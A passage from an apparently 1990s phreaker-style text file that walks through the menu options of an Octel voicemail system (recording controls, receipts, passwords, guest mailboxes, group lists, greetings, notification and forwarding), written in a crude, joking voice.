hour and minutes using the same format above. -Select the time of day, a.m. or p.m., using the format above. After selecting all of the options and getting everything squared away, you are now ready to send the message. Press # to do this. After this enter * to go back to the main menu. Recording controls ------------------ Recording controls are basically identical to playback controls used while listening to messages. There are only a few commands that are different. 5: Resume the recording of a message. 1: Edit message. 11: Listen to what has been recorded. 2: Pause. Then press 5 to re-record over the undesired part of the message. #3. Check Receipt ----------------- After you have entered this section from the main menu by pressing 3 you will be asked the identify the subscriber's mailbox number or enter in their name. All this option does is tell you whether or not the person you sent mail to has listened to your mail or not. If they have not listened to your mail all the way you will not get the receipt. The system will playback every message the subscriber has not listened to. To skip the messages you can press # or press * to cancel the Check Receipt. #4. Personal Options -------------------- Under this section in the main menu there are 6 options you can choose from. 1) Notification On/Off. 2) Administrative options. 3) Greetings. 4) Notification schedule. 5) Mailbox forwarding. & 6)Security Options. (g00d13) There are many levels of menus to this part of the main menu. But don't worry Jane Octel will talk you throught all of the steps...:) 1: Notification On/Off. This option basically sets whether system messages are repeated or not. 1 = On, 2 = Off. 2: Administrative options. (Under this level you have many many choices) 1: Passwords. 1: Personal Password. Your personal password can be up to 15 digits long. Your sysadmin set what is the minimum length required. Do not forget your password because then the sysadmin is forced to kill that mailbox and start you up a new one. The sysadmin will not be a happy camper. But then again sysadmins can eat a dick right? 2: Home Password. This is just some password you can give to members in your family. This just lets them send and receive mail like a guest. 3&4: Guest Password. This is one of the coolest options of all. This is basically a mailbox within a mailbox. You designate a password to one of your friends and he can leave messages to you and you can leave messages to him. But other users on the system cannot send the guest mail. 5: Security Password. This allows someone the option of getting the envelope information for the messages in your mailbox. 2: Group Lists (NOTE You can have a maximum of 15 lists with a maximum of 25 mailboxes). 1: Create list. -Give a two digit number for the list you want to create(from 11 to 25). -Record the name for the list like "Uhh cool asswipes". -Enter either the mailbox number or the name of the people you want on the list. -To review all the names on the list press 1. -To exit and save the list press *. When you want to send a message to a distribution list, enter in the list number when you are prompted to enter in the destination after recording the message etc. 2: Edit existing lists. 3: Delete existing lists. 4: Review or rename lists. 3: Prompt levels. These are the message prompts. It is like setting up menus on a bbs. You can choose novice, skilled, expert. This is not unlike setting up menus to your liking. 1: Standard prompts. These prompts are your basic prompts wich go over basic options such as sending mail etc. 2: Extended prompts. This prompt gives thorough explanations of commands and prompts you for use of all features. 3: Rapid prompts. This prompts cover all features but do not give thorough details and explanations. 4: Date and Time playback. This option tells you the time the message was recieved. You can turn this on by hitting 1 for on or 2 for off. 3: Greetings. 1: Personal greeting. This is the greeting you get once you have called up the front door or you have been transfered to that vmb. It is basically the same for almost all vmbs. You enter in a message like "Uhh this is Da TelcoPiMP, leave a fucking message after the beep!!" You can also choose a standard greeting wich is the Jane Octel voice saying that so and so is not in right now. 2: Extended absence greeting. This greeting just says that you are out for a lengthy period of time and won't be checking messages frequently. If the Message block option is on when the extended absence greeting is on your mailbox will not except messages except for messages from the sysadmin. 3: Name recording. This is a recording of your name which is used to confirm mailboxes when someone has entered in the number of your mailbox. It is also used with the standard greeting. 4: Notification schedule. This function allows your mailbox to call you at certain times (the times you setup) give you messages. -Select 1 for first schedule 2 for second schedule or 3 for temporary schedule. -Enter the telephone you want the system to call you at. -You will be asked to set up a start/stop time for the outcall notification from your mailbox. You can specify whether it applys to weekdays, weekends or both. Enter in the time using the same format as the earlier commands that require you to enter in the time. -Select the type of message that activates the notification. 1 = All, 2 = Urgent and 3 = Group List. -Select how soon you want the system to call you after it receives a new message. 1 = Hour, 2 = Hours, 3 = 4 hours, 4 = 1 day, 5 = immediately and 6 = Never. -After all of this hassle you can confirm your entries or listen again. 1 = Confirm and 2 = Listen again. 5: Mailbox forwarding. (NOTE To have this option work you must have another mailbox created by the sysadmin, for the forwarded messages. Call up the system where the mailbox has been created for you and set it up.) 1: Establish or change the forwarding destination. Enter the network node address? and the forwarding destination mailbox number. 2: Cancel mailbox forwarding. #: Confirmation. 6: Security options. (huhuhuhuh k00l) 1: Turn on access sekurity. (Record your name and the time.) 2: Turn off access sekurity. Ok alittle inpho on this option. Once access security is on you are asked to record your name and time. This is so that the next time you login to your vmb you will hear "The last mailbox access was by at